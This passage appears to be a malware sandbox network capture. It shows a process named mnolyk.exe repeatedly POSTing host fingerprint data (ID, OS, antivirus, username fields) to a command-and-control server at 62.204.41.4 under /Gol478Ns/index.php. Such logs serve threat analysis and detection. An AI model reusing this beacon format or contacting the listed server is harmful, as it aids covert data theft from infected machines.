                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            356 | 192.168.2.4 | 50051 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:08.654161930 CET | 545 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.718580961 CET | 545 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            357 | 192.168.2.4 | 50052 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:08.886986971 CET | 546 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.951896906 CET | 546 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            358 | 192.168.2.4 | 50053 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:09.121134043 CET | 547 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.187989950 CET | 547 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            359 | 192.168.2.4 | 50054 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:09.433029890 CET | 548 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.497119904 CET | 548 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            36 | 192.168.2.4 | 49731 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:35.554583073 CET | 225 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.618865967 CET | 225 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            360 | 192.168.2.4 | 50055 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:09.713047981 CET | 549 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:09.778923988 CET | 549 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            361 | 192.168.2.4 | 50056 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:09.948765039 CET | 550 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.012639046 CET | 550 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            362 | 192.168.2.4 | 50057 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:10.183850050 CET | 551 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.249272108 CET | 551 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            363 | 192.168.2.4 | 50058 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:10.419595957 CET | 552 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.487284899 CET | 552 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            364 | 192.168.2.4 | 50059 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:10.667915106 CET | 553 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.730612993 CET | 553 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            365 | 192.168.2.4 | 50060 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:10.906199932 CET | 554 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.971039057 CET | 554 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            366 | 192.168.2.4 | 50061 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:11.150218964 CET | 555 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.214824915 CET | 555 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            367 | 192.168.2.4 | 50062 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:11.394660950 CET | 556 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.457348108 CET | 556 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            368 | 192.168.2.4 | 50063 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:11.637717962 CET | 557 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.701730967 CET | 557 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            369 | 192.168.2.4 | 50064 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:11.871504068 CET | 558 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.936068058 CET | 558 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            37 | 192.168.2.4 | 49732 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:35.795794964 CET | 226 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.860296965 CET | 226 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            370 | 192.168.2.4 | 50065 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:12.112270117 CET | 559 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.177773952 CET | 559 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            371 | 192.168.2.4 | 50066 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:12.352601051 CET | 560 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.414014101 CET | 560 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            372 | 192.168.2.4 | 50067 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:12.587873936 CET | 561 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.650434971 CET | 561 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            373 | 192.168.2.4 | 50068 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:12.823951006 CET | 561 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.887738943 CET | 562 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            374 | 192.168.2.4 | 50069 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:13.057358027 CET | 562 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.122652054 CET | 563 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            375 | 192.168.2.4 | 50070 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:13.299293041 CET | 564 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.363473892 CET | 564 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            376 | 192.168.2.4 | 50071 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:13.540692091 CET | 565 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.602624893 CET | 565 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            377 | 192.168.2.4 | 50072 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:13.789124012 CET | 566 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.853332043 CET | 566 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            378 | 192.168.2.4 | 50073 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:14.025211096 CET | 567 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.091411114 CET | 567 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            379 | 192.168.2.4 | 50074 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:14.260435104 CET | 568 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
